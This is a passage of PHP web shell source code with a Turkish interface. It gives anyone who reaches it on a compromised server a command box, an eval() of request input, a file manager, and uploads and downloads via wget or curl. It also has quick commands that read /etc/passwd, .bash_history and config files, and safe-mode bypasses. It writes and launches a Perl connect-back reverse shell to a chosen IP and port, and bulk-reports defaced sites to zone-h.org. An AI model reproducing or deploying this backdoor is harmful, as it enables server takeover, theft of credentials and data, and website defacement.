input ("submit","mailsub","Send-mail","");print $ef;die();}
if (isset($_REQUEST['zonet'])&&!empty($_REQUEST['zonet'])){callzone($nscdir);}
function callzone($nscdir){
if (is_writable($nscdir)){$fpz=fopen ("z.pl","w");$zpl='z.pl';$li="bklist.txt";}
else {$fpz=fopen ("/tmp/z.pl","w");$zpl='/tmp/z.pl';$li="/tmp/bklist.txt";}
fwrite ($fpz,"\$arq = @ARGV[0];
\$grupo = @ARGV[1];
chomp \$grupo;
open(a,\"<\$arq\");
@site = <a>;
close(a);
\$b = scalar(@site);
for(\$a=0;\$a<=\$b;\$a++)
{chomp \$site[\$a];
if(\$site[\$a] =~ /http/) { substr(\$site[\$a], 0, 7) =\"\"; }
print \"[+] Sending \$site[\$a]\n\";
use IO::Socket::INET;
\$sock = IO::Socket::INET->new(PeerAddr => \"old.zone-h.org\", PeerPort => 80, Proto => \"tcp\") or next;
print \$sock \"POST /en/defacements/notify HTTP/1.0\r\n\";
print \$sock \"Accept: */*\r\n\";
print \$sock \"Referer: http://old.zone-h.org/en/defacements/notify\r\n\";
print \$sock \"Accept-Language: pt-br\r\n\";
print \$sock \"Content-Type: application/x-www-form-urlencoded\r\n\";
print \$sock \"Connection: Keep-Alive\r\n\";
print \$sock \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n\";
print \$sock \"Host: old.zone-h.org\r\n\";
print \$sock \"Content-Length: 385\r\n\";
print \$sock \"Pragma: no-cache\r\n\";
print \$sock \"\r\n\";
print \$sock \"notify_defacer=\$grupo&notify_domain=http%3A%2F%2F\$site[\$a]&notify_hackmode=22&notify_reason=5&notify=+OK+\r\n\";
close(\$sock);}");
if (touch ($li)==true){$fpl=fopen($li,"w+");fwrite ($fpl,$_REQUEST['zonetxt']);
}else{print "<p>[ Can't complete the operation, try change the current dir with writable one ]<br>";}$zonet=$_REQUEST['zonet'];
if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
{print "[ Can't complete the operation !! ]";}
else {callfuncs("chmod 777 $zpl;chmod 777 $li");
ob_start();callfuncs("perl $zpl $li $zonet");ob_clean();
print "<p>[ All sites should be sended to zone-h.org successfully !! ]";die();}
}if ($dlink=='zone'&&!isset($_REQUEST['zonesub'])){
print $sf."<br>";print "<p><pre><textarea cols=50 rows=10 name=zonetxt>
www.site1.com
www.site2.com
</textarea></pre></p>";input ("text","zonet","Hacker-name",35);print " ";
input ("submit","zonesub","Send","");print $ef;die();}
print "</div></b></center>"; print"</td></tr>";print"</table>";print "<br>";
function inisaf($iniv) { $chkini=ini_get($iniv);
if(($chkini || strtolower($chkini)) !=='on'){print"<font color=DeepSkyBlue ><b>Kapali ( Guvenlik Yok )</b></font>";} else{
print"<font color=red><b>Acik ( Guvenli )</b></font>";}}function inifunc($inif){$chkin=ini_get($inif);
if ($chkin==""){print " <font color=red><b>None</b></font>";}
else {$nchkin=wordwrap($chkin,40,"\n", 1);print "<b><font color=DeepSkyBlue >".$nchkin."</font></b>";}}function callocmd($ocmd,$owhich){if(function_exists(exec)){$nval=exec($ocmd);}elseif(!function_exists(exec)){$nval=shell_exec($ocmd);}
elseif(!function_exists(shell_exec)){$opop=popen($ocmd,'r');
while (!feof($opop)){ $nval= fgetc($opop);}}
elseif(!function_exists(popen)){ ob_start();system($ocmd);$nval=ob_get_contents();ob_clean();}elseif(!function_exists(system)){
ob_start();passthru($ocmd);$nval=ob_get_contents();ob_clean();}
if($nval=$owhich){print"<font color=red><b>ON</b></font>";}
else{print"<font color=DeepSkyBlue ><b>OFF</b></font>";} }
print"<table bgcolor=#191919 style=\"border:2px #dadada solid ;font-size:13px;font-family:tahoma \" width=100% height=%>";
print"<tr><td>"; print"<center><br>";
print"<b>Safe-mode :\t";print inisaf('safe_mode');print "</b>";print"</center>";
if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)||strstr(PHP_OS,"WIN")){print "";}else{print "<table bgcolor=#191919 width=100% height=% style='font-size:13px;font-family:tahoma'><tr><td>";
print "<div align=center>"; print"<br><b>Mysql : </b>";
callocmd('which mysql','/usr/bin/mysql');
print"</td>"; print"<td>"; print"<br><b>Perl : </b>";
callocmd('which perl',('/usr/bin/perl')||'/usr/local/bin/perl');print"</td>"; print"<td>"; print"<br><b>Gcc : </b>";
callocmd('which gcc','/usr/bin/gcc'); print"</td>"; print"<td>";
print"<br><b>Curl : </b>"; callocmd('which curl','/usr/bin/curl'); print"</td>"; print"<td>"; print"<br><b>GET : </b>";
callocmd('which GET','/usr/bin/GET');
print"</td>"; print"<td>";print"<br><b>Wget : </b>";
callocmd('which wget','/usr/bin/wget');
print"</td>"; print"<td>"; print"<br><b>Lynx : </b>";
callocmd('which lynx','/usr/bin/lynx');
print"</td>"; print "</tr></table>"; }print "<hr><br>";
print "<b>IP Numaran : ".$REMOTE_ADDR."<br></b>";
print "<b>Server IP : ".$SERVER_ADDR."</b>";
print"<br><b>".$SERVER_SIGNATURE."</b>";
print "<b>Server ADI : ".$SERVER_NAME." / "."Email : ".$SERVER_ADMIN."<br></b>";
print "<b>Engelli Fonksiyonlar : </b>";inifunc(disable_functions);print"<br>";
print "<b>Kimsin : <b>"; callfuncs('id');print"<br><b>Os : </b>";
if (strstr( PHP_OS, "WIN")){print php_uname(); print " ";print PHP_OS; }else {
if (!function_exists(shell_exec)&&!function_exists(exec)&&
!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
{print php_uname(); print "/";print PHP_OS;}
else {callfuncs('uname -a');}}print"<br>";
print"Php-versiyon : ".phpversion(); print"<br><b>Current-path : </b>";
print $nscdir."&nbsp;&nbsp;&nbsp;&nbsp; [ ";permcol($nscdir);print " ]";
print"<br>";print "Shell'in Burda : " .__file__;
print"<br> Toplam Alan: "; readable_size(disk_total_space($nscdir));print " / ";
print"Bos Alan: "; readable_size(disk_free_space($nscdir));
print "</center><br></font>"; print"</td></tr></table><br>";
if (isset($_REQUEST['credir'])) { $ndir=trim($_REQUEST['dir']);
if (mkdir( $ndir, 0777 )){ $mess=basename($ndir)." created successfully"; }
else{$mess="Klasör Olustur/Sil";}}elseif (isset($_REQUEST['deldir']))
{ $nrm=trim($_REQUEST['dir']);if (is_dir($nrm)&& rmdir($nrm)){$mess=basename($nrm)." deleted successfully"; }else{$mess="Create/Delete Dir";}}
else{$mess="Klasör Olustur/Sil";}if(isset($_REQUEST['crefile'])){
$ncfile=trim($_REQUEST['cfile']);
if (!is_file($ncfile)&&touch($ncfile)){ $mess3=basename($ncfile)." created succefully";unset ($_REQUEST['cfile']);}
else{ $mess3= "Dosya Olustur/Sil";}}
elseif(isset($_REQUEST['delfile'])){
$ndfile=trim($_REQUEST['cfile']);
if (unlink($ndfile)) {$mess3=basename($ndfile)." deleted succefully";}
else {$mess3= "Dosya Olustur/Sil";}}
else {$mess3="Dosya Olustur/Sil";}
class upload{ function upload($file,$tmp){
$nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();if (isset($_REQUEST["up"])){ if (empty($upfile)){print "";}
if (@copy($tmp,$nscdir."/".$file)){
print "<div><center><b>:<font color=DeepSkyBlue > $file </font>uploaded successfully :</b></center></div>"; }else{print "<center><b>: Error uploading<font color=red> $file </font>: </b></center>";} } } }
$obj=new upload($HTTP_POST_FILES['upfile']['name'],$HTTP_POST_FILES['upfile']['tmp_name']); if (isset ($_REQUEST['ustsub'])){
$ustname=trim ($_REQUEST['ustname']);ob_start();
if ($_REQUEST['ustools']='t1'){callfuncs('wget '.$ustname);}
if ($_REQUEST['ustools']='t2'){callfuncs('curl -o basename($ustname) $ustname');}
if ($_REQUEST['ustools']='t3'){callfuncs('lynx -source $ustname > basename($ustname)');}
if ($_REQUEST['ustools']='t9'){callfuncs('GET $ustname > basename($ustname)');}
if ($_REQUEST['ustools']='t4'){callfuncs('unzip '.$ustname);}
if ($_REQUEST['ustools']='t5'){callfuncs('tar -xvf '.$ustname);}
if ($_REQUEST['ustools']='t6'){callfuncs('tar -zxvf '.$ustname);}
if ($_REQUEST['ustools']='t7'){callfuncs('chmod 777 '.$ustname);}
if ($_REQUEST['ustools']='t8'){callfuncs('make '.$ustname);}ob_clean();}
if (!isset($_REQUEST['cmd'])&&!isset($_REQUEST['eval'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['edit'])&&!isset($_REQUEST['subqcmnds'])&&!isset ($_REQUEST['safefile'])&&!isset ($_REQUEST['inifile'])&&!isset($_REQUEST['bip'])&&
!isset($_REQUEST['rfiletxt'])){
if ($dh = dir($nscdir)){ while (true == ($filename =$dh->read())){
$files[] = $filename; sort($files);}print "<br>";
print"<center><table bgcolor=#2A2A2A style=\"border:1px solid black\" width=100% height=6% ></center>";
print "<tr><td width=43% style=\"border:1px solid black\">";
print "<center><b>Dosyalar";print "</td>";
print "<td width=8% style=\"border:1px solid black\">";print "<center><b>Boyut";print "</td>";
print "<td width=3% style=\"border:1px solid black\">";print "<center><b>Yazma";print "</td>";
print "<td width=3% style=\"border:1px solid black\">";print "<center><b>Okuma";print "</td>";
print "<td width=5% style=\"border:1px solid black\">";print "<center><b>Tür";print "</td>";
print "<td width=5% style=\"border:1px solid black\">";print "<center><b>Düzenleme";print "</td>";
print "<td width=5% style=\"border:1px solid black\">";print "<center><b>Adlandirma";print "</td>";
print "<td width=6% style=\"border:1px solid black\">";print "<center><b>Indir";print "</td>";if(strstr(PHP_OS,"Linux")){
print "<td width=8% style=\"border:1px solid black\">";print "<center><b>Group";print "</td>";}
print "<td width=8% style=\"border:1px solid black\">";print "<center><b>Izinler";print "</td></tr>"; foreach ($files as $nfiles){
if (is_file("$nscdir/$nfiles")){ $scmess1=filesize("$nscdir/$nfiles");}
if (is_writable("$nscdir/$nfiles")){
$scmess2= "<center><font color=DeepSkyBlue >Evet";}else {$scmess2="<center><font color=red>Hayir";}if (is_readable("$nscdir/$nfiles")){
$scmess3= "<center><font color=DeepSkyBlue >Evet";}else {$scmess3= "<center><font color=red>Hayir";}if (is_dir("$nscdir/$nfiles")){$scmess4= "<font color=red><center>Klasör";}else{$scmess4= "<center><font color=DeepSkyBlue >Dosya";}
print"<tr><td style=\"border:1px solid black\">";
if (is_dir($nfiles)){print "<font face= tahoma size=2 color=DeepSkyBlue >[ $nfiles ]<br>";}else {print "<font face= tahoma size=2 color=#dadada>$nfiles <br>";}
print"</td>"; print "<td style=\"border:1px solid black\">";
print "<center><font face= tahoma size=2 color=#dadada>";
if (is_dir("$nscdir/$nfiles")){print "<b>K</b>lasör";}
elseif(is_file("$nscdir/$nfiles")){readable_size($scmess1);}else {print "---";}
print "</td>"; print "<td style=\"border:1px solid black\">";
print "<center><font face= tahoma size=2 >$scmess2"; print "</td>";
print"<td style=\"border:1px solid black\">";
print "<center><font face= tahoma size=2 >$scmess3"; print "</td>";
print "<td style=\"border:1px solid black\">";
print "<center><font face= tahoma size=2 >$scmess4"; print"</td>";
print "<td style=\"border:1px solid black\">";if(is_file("$nscdir/$nfiles")){
print " <center><a href=".inclink('dlink', 'edit')."&edit=$nfiles&scdir=$nscdir>Düzenle</a>";}else {print "<center><font face=tahoma size=2 color=gray>Düzenle</center>";}print"</td>"; print "<td style=\"border:1px solid black\">";print " <center><a href=".inclink('dlink', 'ren')."&ren=$nfiles&scdir=$nscdir>Adlandir</a>";print"</td>";print "<td style=\"border:1px solid black\">";
if(is_file("$nscdir/$nfiles")){
print " <center><a href=".inclink('dlink', 'dwld')."&dwld=$nfiles&scdir=$nscdir>indir</a>";}else {print "<center><font face=tahoma size=2 color=gray>indir</center>";}print"</td>"; if(strstr(PHP_OS,"Linux")){
print "<td style=\"border:1px solid black\">";
print "<center><font face=tahoma size=2 color=#dadada>";owgr($nfiles);
print "</center>";print"</td>";}
print "<td style=\"border:1px solid DeepSkyBlue \">";print "<center><div>";
permcol("$nscdir/$nfiles");print "</div>";print"</td>"; print "</tr>";
}print "</table>";print "<br>";}else {print "<div><br><center><b>[ Can't open the Dir, permission denied !! ]<p>";}}
elseif (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])||isset($_REQUEST['eval'])||isset($_REQUEST['subqcmnds'])){
if (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])){print "<div><b><center>[ Executed command ][$] : ".$_REQUEST['cmd']."</div></center>";}
print "<pre><center>".$sta;
if (isset($_REQUEST['cmd'])){$cmd=trim($_REQUEST['cmd']);callfuncs($cmd);}
elseif(isset($_REQUEST['eval'])){
ob_start();eval(stripslashes(trim($_REQUEST['eval'])));
$ret = ob_get_contents();ob_clean();print htmlspecialchars($ret);}
elseif (isset($_REQUEST['subqcmnds'])){
if ($_REQUEST['uscmnds']=='op1'){callfuncs('ls -lia');}
if ($_REQUEST['uscmnds']=='op2'){callfuncs('cat /etc/passwd');}
if ($_REQUEST['uscmnds']=='op3'){callfuncs('cat /var/cpanel/accounting.log');}
if ($_REQUEST['uscmnds']=='op4'){callfuncs('ls /var/named');}
if ($_REQUEST['uscmnds']=='op11'){callfuncs('find ../ -type d -perm -2 -ls');}
if ($_REQUEST['uscmnds']=='op12'){callfuncs('find ./ -type d -perm -2 -ls');}
if ($_REQUEST['uscmnds']=='op5'){callfuncs('find ./ -name service.pwd ');}
if ($_REQUEST['uscmnds']=='op6'){callfuncs('find ./ -name config.php');}
if ($_REQUEST['uscmnds']=='op7'){callfuncs('find / -type f -name .bash_history');}
if ($_REQUEST['uscmnds']=='op8'){callfuncs('cat /etc/hosts');}
if ($_REQUEST['uscmnds']=='op9'){callfuncs('finger root');}
if ($_REQUEST['uscmnds']=='op10'){callfuncs('netstat -an | grep -i listen');}
if ($_REQUEST['uscmnds']=='op13'){callfuncs('cat /etc/services');}
}print $eta."</center></pre>";}
function rdread($nscdir,$sf,$ef){$rfile=trim($_REQUEST['rfile']);
if(is_readable($rfile)&&is_file($rfile)){
$fp=fopen ($rfile,"r");print"<center>";
print "<div><b>[ Editing <font color=DeepSkyBlue >".basename($rfile)."</font> ] [<a href='javascript:history.back()'> Geri </a>] [<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>]</b></div><br>";
print $sf."<textarea cols=157 rows=23 name=rfiletxt>";
while (!feof($fp)){$lines = fgetc($fp);
$nlines=htmlspecialchars($lines);print $nlines;}
fclose($fp);print "</textarea>";if (is_writable($rfile)){
print "<center><input type=hidden value=$rfile name=hidrfile><input type=submit value='Save-file' > <input type=reset value='Reset' ></center>".$ef;}else
{print "<div><b><center>[ Can't edit <font color=DeepSkyBlue >".basename($rfile)."</font> ]</center></b></div><br>";}print "</center><br>";}
elseif (!file_exists($_REQUEST['rfile'])||!is_readable($_REQUEST['rfile'])||$_REQUEST['rfile']=$nscdir){print "<div><b><center>[ You selected a wrong file name or you don't have access !! ]</center></b></div><br>";}}
function rdsave($nscdir){$hidrfile=trim($_REQUEST['hidrfile']);
if (is_writable($hidrfile)){$rffp=fopen ($hidrfile,"w+");
$rfiletxt=stripslashes($_REQUEST['rfiletxt']);
fwrite ($rffp,$rfiletxt);print "<div><b><center>
[ <font color=DeepSkyBlue >".basename($hidrfile)."</font> Saved !! ]
[<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>] [<a href='javascript:history.back()'> Edit again </a>]
</center></b></div><br>";fclose($rffp);}
else {print "<div><b><center>[ Can't save the file !! ] [<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>] [<a href='javascript:history.back()'> Back </a>]</center></b></div><br>";}}
if (isset ($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])){rdread($nscdir,$sf,$ef);}
elseif (isset($_REQUEST['rfiletxt'])){rdsave($nscdir);}
function callperms($chkperms){
$perms = fileperms($chkperms);
if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}
// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-')); print $info;}
function readable_size($size) {
if ($size < 1024) {
print $size . ' B';
}else {$units = array("kB", "MB", "GB", "TB");
foreach ($units as $unit) {
$size = ($size / 1024);
if ($size < 1024) {break;}}printf ("%.2f",$size);print ' ' . $unit;}}
if($dlink=='ren'&&!isset($_REQUEST['rensub'])){
print "<div><b><center>[<a href=".$PHP_SELF."?scdir=$nscdir> Geri </a>]</div>";
print "<center>".$sf;input ("text","ren",$_REQUEST['ren'],20);print " ";
input ("text","renf","New-name",20);print " ";
input ("submit","rensub","Rename" ,"");print $ef;die();}else print "";
if (isset ($_REQUEST['ren'])&&isset($_REQUEST['renf'])){
if (rename($nscdir."/".$_REQUEST['ren'],$nscdir."/".$_REQUEST['renf'])){
print"<center><div><b>[ ". $_REQUEST['ren']." is renamed to " .$sfnt.$_REQUEST['renf'].$efnt." successfully ]</center></div></b>";print "<div><b><center>[<a href=".inclink('dlink', 'rcurrdir')."&scdir=$nscdir> Curr-dir </a>]</div>";die();}else{print "<div><b><center>[ Yeniden Adlandirilamiyor ]</div>";
print "<div><b><center>[<a href=".inclink('dlink', 'rcurrdir')."&scdir=$nscdir> Geri </a>]</div>";die();}}function fget($nscdir,$sf,$ef){print "<center>";
print "<div><b>[ Editing <font color=DeepSkyBlue >".basename($_REQUEST['edit'])."</font> ] [<a href='javascript:history.back()'> Geri </a>] [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]</b></div>";
print $sf."<textarea cols=157 rows=23 name=edittxt>";
$alltxt= file_get_contents($_REQUEST['edit']);
$nalltxt=htmlspecialchars($alltxt);print $nalltxt;print "</textarea></center>";
if (is_writable($_REQUEST['edit'])){
print "<center><input type=submit value='Save-file' > <input type=reset value='Reset' ></center>".$ef;}else {print "<div><b><center>[ Can't edit
<font color=DeepSkyBlue >".basename($_REQUEST['edit'])."</font> ]</center></b></div><br>";}}function svetxt(){
$fp=fopen ($_REQUEST['edit'],"w");if (is_writable($_REQUEST['edit'])){
$nedittxt=stripslashes($_REQUEST['edittxt']);
fwrite ($fp,$nedittxt);print "<div><b><center>[ <font color=DeepSkyBlue >".basename($_REQUEST['edit'])."</font> Saved !! ]</center></b></div>";fclose($fp);}else {print "<div><b><center>[ Can't save the file !! ]</center></b></div>";}}
if ($dlink=='edit'&&!isset ($_REQUEST['edittxt'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])&&!isset($_REQUEST['subqcmnds'])&&!isset($_REQUEST['eval']))
{fget($nscdir,$sf,$ef);}elseif (isset ($_REQUEST['edittxt']))
{svetxt();fget($nscdir,$sf,$ef);}else {print "";}function owgr($file){
$fileowneruid=fileowner($file); $fileownerarray=posix_getpwuid($fileowneruid);
$fileowner=$fileownerarray['name']; $fileg=filegroup($file);
$groupinfo = posix_getgrgid($fileg);$filegg=$groupinfo['name'];
print "$fileowner/$filegg"; }$cpyf=trim($_REQUEST['cpyf']);$ftcpy=trim($_REQUEST['ftcpy']);$cpmv= $cpyf.'/'.$ftcpy;if (isset ($_REQUEST['cpy'])){
if (copy($ftcpy,$cpmv)){$cpmvmess=basename($ftcpy)." copied successfully";}else {$cpmvmess="Can't copy ".basename($ftcpy);}}
elseif(isset($_REQUEST['mve'])){
if (copy($ftcpy,$cpmv)&&unlink ($ftcpy)){$cpmvmess= basename($ftcpy)." moved successfully";}else {$cpmvmess="Can't move ".basename($ftcpy);}
}else {$cpmvmess="Kopyala/Tasimak için Dosya Seç";}
if (isset ($_REQUEST['safefile'])){
$file=$_REQUEST['safefile'];$tymczas="";if(empty($file)){
if(empty($_GET['file'])){if(empty($_POST['file'])){
print "<center>[ Please choose a file first to read it using copy() ]</center>";
} else {$file=$_POST['file'];}} else {$file=$_GET['file'];}}
$temp=tempnam($tymczas, "cx");if(copy("compress.zlib://".$file, $temp)){
$zrodlo = fopen($temp, "r");$tekst = fread($zrodlo, filesize($temp));
fclose($zrodlo);echo "<center><pre>".$sta.htmlspecialchars($tekst).$eta."</pre></center>";unlink($temp);} else {
print "<FONT COLOR=\"RED\"><CENTER>Sorry, Can't read the selected file !!
</CENTER></FONT><br>";}}if (isset ($_REQUEST['inifile'])){
ini_restore("safe_mode");ini_restore("open_basedir");
print "<center><pre>".$sta;
if (include(htmlspecialchars($_REQUEST['inifile']))){}else {print "Sorry, can't read the selected file !!";}print $eta."</pre></center>";}
if (isset ($_REQUEST['bip'])&&isset ($_REQUEST['bport'])){callback($nscdir,$_REQUEST['bip'],$_REQUEST['bport']);}
function callback($nscdir,$bip,$bport){
if(strstr(php_os,"WIN")){$epath="cmd.exe";}else{$epath="/bin/sh";}
if (is_writable($nscdir)){
$fp=fopen ("back.pl","w");$backpl='back.pl';}
else {$fp=fopen ("/tmp/back.pl","w");$backpl='/tmp/back.pl';}
fwrite ($fp,"use Socket;
\$system='$epath';
\$sys= 'echo \"[ Operating system ][$]\"; echo \"`uname -a`\";
echo \"[ Curr DIR ][$]\"; echo \"`pwd`\";echo;
echo \"[ User perms ][$]\";echo \"`id`\";echo;
echo \"[ Start shell ][$]\";';
if (!\$ARGV[0]) {
exit(1);
}
\$host = \$ARGV[0];
\$port = 80;
if (\$ARGV[1]) {
\$port = \$ARGV[1];
}
\$proto = getprotobyname('tcp') || die('Unknown Protocol\n');
socket(SERVER, PF_INET, SOCK_STREAM, \$proto) || die ('Socket Error\n');
my \$target = inet_aton(\$host);
if (!connect(SERVER, pack 'SnA4x8', 2, \$port, \$target)) {
die('Unable to Connect\n');
}
if (!fork( )) {
open(STDIN,'>&SERVER');
open(STDOUT,'>&SERVER');
open(STDERR,'>&SERVER');
print '\n[ Bk-Code shell by Black-Code :: connect back backdoor by Crash_over_ride ]';
print '\n[ A-S-T team ][ Lezr.com ]\n\n';
system(\$sys);system (\$system);
exit(0); }
");callfuncs("chmod 777 $backpl");
ob_start();
callfuncs("perl $backpl $bip $bport");
ob_clean();
print "<div><b><center>[ Selected IP is ".$_REQUEST['bip']." and port is ".$_REQUEST['bport']." ]<br>
[ Check your connection now, if failed try changing the port number ]<br>
[ Or Go to a writable dir and then try to connect again ]<br>
[ Return to the Current dir ] [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]
</div><br>";}if (isset($_REQUEST['uback'])){
$uback=$_REQUEST['uback'];$upip=$_REQUEST['upip'];
if ($_REQUEST['upports']=="up80"){callfuncs("perl $uback $upip 80");}
elseif ($_REQUEST['upports']=="up443"){callfuncs("perl $uback $upip 443");}
elseif ($_REQUEST['upports']=="up2121"){callfuncs("perl $uback $upip 2121");}}
delm("# Komut ÇAlistir #");print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100% height=18%>";
print "<tr><td width=32%><div align=left>";
print $st.$c1."<center><div><b>".$mess3.$ec;
print $c2.$sf."<center>";input("text","cfile","",53);
input("hidden","scdir",$nscdir,0);print "<br>";
input("submit","crefile","Olustur","");
print " ";input("submit","delfile","Sil","");
print "</center>".$ef.$ec.$et."</div></td>";
print "<td><div align=center>".$st.$c1;
print "<center><div><b>Enter the command to execute";print $ec;
print $c2.$sf."<center><div style='margin-top:7px'>";
input("text","cmd","",59);input("hidden","scdir",$nscdir,0);print"<br>";
input("submit","","Execute","");print "</center>".$ef.$ec.$et."</div></td>";
print "<td width=32%><div align=right>";print $st.$c1;
print "<center><div><b>$mess".$ec.$c2.$sf."<center>";
input("text","dir","",53);input("hidden","scdir",$nscdir,0);print "<br>";
input("submit","credir","Create-D","");print " ";
input("submit","deldir","Delete-D","");
print "</center>".$ef.$ec.$et."</div></td></tr>";
print "<tr><td width=32%><div align=left>";print $st.$c1;
print "<center><div><b>Dosya Düzenle/Oku".$ec;print $c2.$sf."<center>";
input("text","rfile",$nscdir,53);input("hidden","scdir",$nscdir,0);print "<br>";
input("submit","","Oku-Düzenle","");print "</center>".$ef.$ec.$et."</div></td>";
print "<td><div align=center>";print $st.$c1;
print "<center><div><b>Dizin'i Göster<br>";print $ec.$c2.$sf."<center><div style='margin-top:7px'>"; input("text","scdir",$nscdir,59);print"<br>";
input("submit","","Göster","");print " ";
input("reset","","R00T","");print "</center>".$ef.$ec.$et."</div></td>";
print "<td><div align=center>";print $st.$c1;
print "<center><div><b>Dosya Boyutu : ".filesize($upfile)." in ( B/Kb )";print $ec.$c2."<form method=post Enctype=multipart/form-data><center>";
input("file","upfile","",40);input("hidden","scdir",$nscdir,0);
input("hidden","up",$nscdir,0);
print"<br>";input("submit","","Upload","");print "</center>".$ef.$ec.$et."</div></td></tr>";
delm("");print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";print "<tr><td width=50%><div align=left>";
print $st.$c1."<div><b><center>Execute php code with eval()</div>";
print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0);
print "&nbsp;<textarea cols=73 rows=3 name=eval>";
if(!isset($evsub)){print "//system('id'); //readfile('/etc/passwd'); //passthru('pwd');";}else{print htmlspecialchars(stripslashes($eval));}
print "</textarea><br><center>";
input('submit','evsub','Execute');print " ";
input('Reset','','Reset');print " ";
print "</center>".$ec.$ef.$et;
print "</td><td height=20% width=50%><div align=center>";
print $st.$c1."<div><b><center>Execute useful commands</div>";
print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0);
print "<center><select style='width:60%' name=uscmnds size=1>
<option value='op0'>Execute quick commands</option>
<option value='op1'>ls -lia</option>
<option value='op2'>/etc/passwd</option>
<option value='op3'>/var/cpanel/accounting.log</option>
<option value='op4'>/var/named</option>
<option value='op11'>Perms in curr Dir</option>
<option value='op12'>Perms in main Dir</option>
<option value='op5'>Find service.pwd files</option>
<option value='op6'>Find config files</option>
<option value='op7'>Find .bash_history files</option>
<option value='op8'>Read hosts file</option>
<option value='op9'>Root login</option>
<option value='op10'>Show opened ports</option>
<option value='op13'>Show services</option>
</select> ";print"<input type=submit name=subqcmnds value=Execute style='height:20'> <input type=reset value=Return style='height:20'></center>";
print $ec.$ef.$et."</td></tr></table>";delm("");
print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
print "<tr><td width=50%><div align=left>";
print $st.$c1."<div><b><center>".$cpmvmess."</div>";
print $ec.$c2.$sf."&nbsp;";input("text","ftcpy","File-name",15);
print "<b><font face=tahoma size=2>&nbsp;To </b>";
input("text","cpyf",$nscdir,45);input("hidden","scdir",$nscdir,0);print " ";
input("submit","cpy","Copy","");print " ";input("submit","mve","Move","");
print "</center>".$ec.$ef.$et;
print "</td><td height=20% width=50%><div align=right>";
print $st.$c1."<div><b><center>Cok kullanilan Komutlar</div>";
print $ec.$c2.$sf."&nbsp";input("hidden","scdir",$nscdir,0);
print "<select style='width:22%' name=ustools size=1>
<option value='t1'>Wget</option><option value='t2'>Curl</option>
<option value='t3'>Lynx</option><option value='t9'>Get</option>
<option value='t4'>Unzip</option><option value='t5'>Tar</option>
<option value='t6'>Tar.gz</option><option value='t7'>Chmod 777</option>
<option value='t8'>Make</option></select> ";input('text','ustname','',51);print " ";input('submit','ustsub','Execute');print "</center>".$ec.$ef.$et;
print "</td></tr></table>";delm(": Safe mode bypass :");
print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
print "<tr><td width=50%><div align=left>";
print $st.$c1."<div><b><center>Using copy() function</div>";
print $ec.$c2.$sf."&nbsp;";input("text","safefile",$nscdir,75);
input("hidden","scdir",$nscdir,0);print " ";
input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
print "</td><td height=20% width=50%><div align=right>";
print $st.$c1."<div><b><center>Using ini_restore() function</div>";
print $ec.$c2.$sf."&nbsp;";input("text","inifile",$nscdir,75);
input("hidden","scdir",$nscdir,0);print " ";
input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
print "</td></tr></table>";delm("# Backdoor Baglantisi #");
print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
print "<tr><td width=50%><div align=left>";
print $st.$c1."<div><b><center>Backdoor ile Baglan</div>";
print $ec.$c2.$sf."&nbsp;";input("text","bip",$REMOTE_ADDR,47);print " ";
input("text","bport",80,10);input("hidden","scdir",$nscdir,0);print " ";
input("submit","","Connect","");print " ";input("reset","","Reset","");
print "</center>".$ec.$ef.$et;print "</td><td height=20% width=50%><div align=right>";print $st.$c1."<div><b><center>Yüklenmis Backdoor</div>";
print $ec.$c2.$sf."&nbsp;";print "<select style='width:15%' name=upports size=1>
<option value='up80'>80</option><option value='up443'>443</option>
<option value='up2121'>2121</option></select>";print " ";
input("text","uback","back.pl",23);print " ";
input("text","upip",$REMOTE_ADDR,29);print " ";input("submit","subupb","Connect");
